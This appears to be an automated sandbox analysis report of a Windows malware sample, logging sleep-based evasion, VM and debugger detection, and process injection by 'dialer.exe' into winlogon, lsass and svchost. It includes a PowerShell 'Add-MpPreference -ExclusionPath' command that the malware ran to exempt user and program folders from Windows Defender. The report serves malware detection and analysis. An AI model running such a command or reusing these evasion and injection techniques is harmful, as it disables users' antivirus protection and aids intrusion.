Source: C:\Windows\System32\winlogon.exe TID: 2588	Thread sleep count: 4235 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2588	Thread sleep time: -4235000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2588	Thread sleep count: 5764 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2588	Thread sleep time: -5764000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7576	Thread sleep count: 9905 > 30
Source: C:\Windows\System32\lsass.exe TID: 7576	Thread sleep time: -9905000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668	Thread sleep count: 5172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668	Thread sleep count: 3149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7716	Thread sleep count: 241 > 30
Source: C:\Windows\System32\svchost.exe TID: 7716	Thread sleep time: -241000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7796	Thread sleep count: 9858 > 30
Source: C:\Windows\System32\dwm.exe TID: 7796	Thread sleep time: -9858000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 8100	Thread sleep count: 1417 > 30
Source: C:\Windows\System32\dialer.exe TID: 8100	Thread sleep time: -141700s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7772	Thread sleep count: 490 > 30
Source: C:\Windows\System32\dialer.exe TID: 7772	Thread sleep time: -49000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 6008	Thread sleep time: -85000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4900	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 4900	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2136	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 2136	Thread sleep time: -253000s >= -30000s

Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\ProgramData\main.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\dialer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF61D337F4C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF61D337F4C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D341FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF61D341FE4
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D328B00 FindFirstFileExW,FindClose,	0_2_00007FF61D328B00
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_000EA69B
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_000FC220
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB1DB0 FindFirstFileExA,	5_2_00007FFDF7CB1DB0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC64DCE0 FindFirstFileExW,	22_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6ADCE0 FindFirstFileExW,	22_2_00000225DC6ADCE0
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AEDCE0 FindFirstFileExW,	26_2_00000202C0AEDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A66130DCE0 FindFirstFileExW,	29_2_000002A66130DCE0
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF02DCE0 FindFirstFileExW,	30_2_000002BAAF02DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879CDCE0 FindFirstFileExW,	51_2_0000026A879CDCE0

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Code function: 4_2_000FE6A3 VirtualQuery,GetSystemInfo,

4_2_000FE6A3

Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599665	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599322	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597976	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597389	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597278	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596113	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595763	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595639	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595420	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595089	Jump to behavior
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: main.exe, 00000005.00000002.1756028190.000002441A88E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: main.exe, 00000005.00000002.1775219173.00000244324E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: s.exe, 00000004.00000002.1683325583.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: vmware
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: PreventStartOnVirtualMachine
Source: main.exe, 00000005.00000002.1775219173.00000244324E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: VMwareVBox
Source: main.exe, 00000005.00000002.1754567192.0000024417F1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	API call chain: ExitProcess graph end node	graph_4-23942
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node

Source: C:\ProgramData\main.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D32C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF61D32C67C

Source: C:\ProgramData\main.exe

Code function: 5_2_00007FFDF7CF1120 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,

5_2_00007FFDF7CF1120

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Code function: 4_2_00107DEE mov eax, dword ptr fs:[00000030h]

4_2_00107DEE

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D343BF0 GetProcessHeap,

0_2_00007FF61D343BF0

Source: C:\ProgramData\main.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D32C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF61D32C67C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D32BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF61D32BDE0
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D32C860 SetUnhandledExceptionFilter,	0_2_00007FF61D32C860
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D33ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF61D33ACD8
Source: C:\Users\user\Desktop\hacn.exe	Code function: 1_2_00007FFE1A46004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFE1A46004C
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_000FF838
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FF9D5 SetUnhandledExceptionFilter,	4_2_000FF9D5
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_000FFBCA
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_00108EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00108EBD
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CAD4C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDF7CAD4C8
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA1214 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFDF7CA1214
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA1D14 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDF7CA1D14
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000225DC647D90
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000225DC64D2A4
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000225DC6A7D90
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000225DC6AD2A4
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00000202C0AED2A4
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00000202C0AE7D90
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A66130D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002A66130D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A661307D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002A661307D90
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF02D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_000002BAAF02D2A4
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF027D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_000002BAAF027D90
Source: C:\Windows\System32\dialer.exe	Code function: 49_2_00007FF713F11131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	49_2_00007FF713F11131
Source: C:\Windows\System32\dialer.exe	Code function: 49_2_00007FF713F1F1C0 SetUnhandledExceptionFilter,	49_2_00007FF713F1F1C0
Source: C:\Windows\System32\dialer.exe	Code function: 49_2_00007FF713F14FC9 SetUnhandledExceptionFilter,	49_2_00007FF713F14FC9
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	51_2_0000026A879CD2A4
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	51_2_0000026A879C7D90

Source: C:\ProgramData\main.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAEFF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 8810000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
